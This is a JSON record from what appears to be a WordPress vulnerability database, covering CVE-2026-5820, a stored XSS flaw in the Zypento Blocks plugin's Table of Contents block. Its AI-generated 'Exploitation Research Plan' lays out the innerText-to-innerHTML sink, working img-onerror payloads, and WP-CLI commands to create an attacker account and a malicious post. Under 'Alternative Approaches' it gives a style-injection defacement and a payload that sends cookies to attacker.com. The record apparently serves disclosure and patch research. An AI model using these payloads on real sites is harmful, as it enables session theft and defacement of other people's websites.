[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpzLSI55iPNtULHsecpWoL-G0bE1224jT5PaCJp0_glk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-5820","zypento-blocks-authenticated-author-stored-cross-site-scripting-via-table-of-contents-block","Zypento Blocks \u003C= 1.0.6 - Authenticated (Author+) Stored Cross-Site Scripting via Table of Contents Block","The Zypento Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 1.0.6. This is due to the front-end TOC rendering script reading heading text via `innerText` and inserting it into the page using `innerHTML` without proper sanitization. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","zypento-blocks",null,"\u003C=1.06","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:03:28","2026-05-11 21:04:18",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F024a6a0f-f819-40e7-9618-71219c27aa64?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5820 (Zypento Blocks Stored XSS)\n\n## 1. Vulnerability Summary\nThe Zypento Blocks plugin (\u003C= 1.0.6) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the frontend rendering logic of the \"Table of Contents\" (TOC) block. Specifically, the plugin's JavaScript script responsible for generating the TOC list on the client side extracts heading text from the page using the `.innerText` property but subsequently inserts this text into the TOC container using the `.innerHTML` property without sanitization. This allows an attacker with Author-level privileges or higher to inject malicious HTML\u002FJavaScript into a heading, which is then executed in the context of any user viewing the page when the TOC script processes it.\n\n## 2. Attack Vector Analysis\n* **Vulnerable Component:** Table of Contents Block (frontend rendering script).\n* **Endpoint:** WordPress Post Editor (`\u002Fwp-admin\u002Fpost-new.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`).\n* **Required Role:** Author, Editor, or Administrator.\n* **Payload Location:** Inside a Heading block (`h1`, `h2`, `h3`, etc.) on a post that also contains the Zypento Table of Contents block.\n* **Preconditions:** The Zypento Blocks plugin must be active, and a post must be published containing both a TOC block and a malicious heading.\n\n## 3. Code Flow (Inferred)\n1. **Post Creation:** An Author creates a post containing the block `\u003C!-- wp:zypento\u002Ftable-of-contents \u002F-->` and a heading like `\u003Ch2><img src=x onerror=alert(1)>\u003C\u002Fh2>`.\n2. **Frontend Loading:** A user views the post. WordPress enqueues the TOC frontend script (likely named `view.js` or `toc.js` located in the plugin's block assets).\n3. **Heading Extraction:** The script queries the DOM for heading elements within the post content (e.g., `document.querySelectorAll('h1, h2, h3')`).\n4. **Vulnerable Sink:**\n * The script iterates through the headings.\n * It retrieves the \"text\" using `const title = heading.innerText;`. If the heading HTML was `<img src=x onerror=alert(1)>`, `innerText` returns the literal string `\u003Cimg src=x onerror=alert(1)>`.\n * The script creates a list item for the TOC and sets its content: `tocItem.innerHTML = `\u003Ca href=\"#...\">${title}\u003C\u002Fa>`;`.\n5. **Execution:** The browser parses the `innerHTML` assignment, creates the `\u003Cimg>` element, and executes the `onerror` handler.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a post with specific content. \n* **Post Creation via WP-CLI:** The easiest way to set up the exploit without worrying about REST API nonces or CSRF is to use `wp post create`.\n* **Manual Exploitation via UI:** If performing the exploit via the browser, the standard WordPress `_wpnonce` for the post editor is required. This is found in the `wp-admin\u002Fpost.php` or `post-new.php` source code.\n* **Frontend Script:** No nonce is required for the *execution* phase, as it occurs automatically when any user (including an Administrator) views the published post.\n\n## 5. Exploitation Strategy\n1. **Authentication:** Authenticate as an Author user.\n2. **Payload Preparation:** The payload must be HTML-encoded within the heading so that `innerText` returns the raw HTML tags to be later interpreted by `innerHTML`.\n * Payload: `<img src=x onerror=\"alert('XSS_SUCCESS_VULN_ID_5820')\">`\n3. **Post Injection:** Create a post containing the TOC block and the malicious heading.\n * **Block Content:**\n ```html\n \u003C!-- wp:zypento\u002Ftable-of-contents {\"title\":\"TOC\"} \u002F-->\n \u003Ch2><img src=x onerror=\"alert(window.origin)\">\u003C\u002Fh2>\n ```\n4. **Verification of Trigger:** Navigate to the published post's URL and observe the JavaScript execution.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `zypento-blocks` version 1.0.6 is installed and active.\n2. **Create Author User:**\n ```bash\n wp user create attacker attacker@example.com --role=author --user_pass=password123\n ```\n3. **Create Malicious Post:**\n ```bash\n wp post create --post_type=post \\\n --post_status=publish \\\n --post_title=\"Vulnerable TOC Page\" \\\n --post_author=$(wp user get attacker --field=ID) \\\n --post_content='\u003C!-- wp:zypento\u002Ftable-of-contents \u002F-->\u003Ch2><img src=x onerror=\"console.log(\\\"XSS_TRIGGERED\\\")\">\u003C\u002Fh2>'\n ```\n\n## 7. Expected Results\n* When the post is rendered, the TOC block will be generated by JavaScript.\n* A link will appear in the TOC.\n* Because the TOC script uses `innerHTML` to insert the heading's `innerText`, the browser will execute the `onerror` event of the injected image tag.\n* The browser console will show \"XSS_TRIGGERED\" or an alert box will appear.\n\n## 8. Verification Steps\n1. **Check Post Content:** Verify the post content was saved correctly.\n ```bash\n wp post get \u003CPOST_ID> --field=post_content\n ```\n2. **Inspect Frontend HTML:** Use `http_request` to fetch the post and check if the TOC script is enqueued.\n ```bash\n # Look for the plugin's JS file\n curl -s http:\u002F\u002Flocalhost:8080\u002Fvulnerable-toc-page\u002F | grep \"zypento\"\n ```\n3. **Simulate Execution:** Use `browser_navigate` to the post URL and check for the console log.\n\n## 9. Alternative Approaches\n* **Style Injection:** If `alert()` is blocked, try injecting a style tag to deface the page:\n * `\u003Ch2><style>body{background:red !important;}<\u002Fstyle>\u003C\u002Fh2>`\n* **Data Exfiltration:** Attempt to exfiltrate the administrator's cookie if they view the page:\n * `\u003Ch2><img src=x onerror=\"fetch('http:\u002F\u002Fattacker.com\u002F?c='+document.cookie)\">\u003C\u002Fh2>`\n* **Block Name Variation:** If `zypento\u002Ftable-of-contents` is not the exact slug, use `wp-cli` to list registered blocks or check the plugin's `src\u002Findex.js`. (Inferred slug: `zypento\u002Ftable-of-contents`).","gemini-3-flash-preview","2026-04-27 14:05:18","2026-04-27 14:05:37",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fzypento-blocks\u002Ftags"]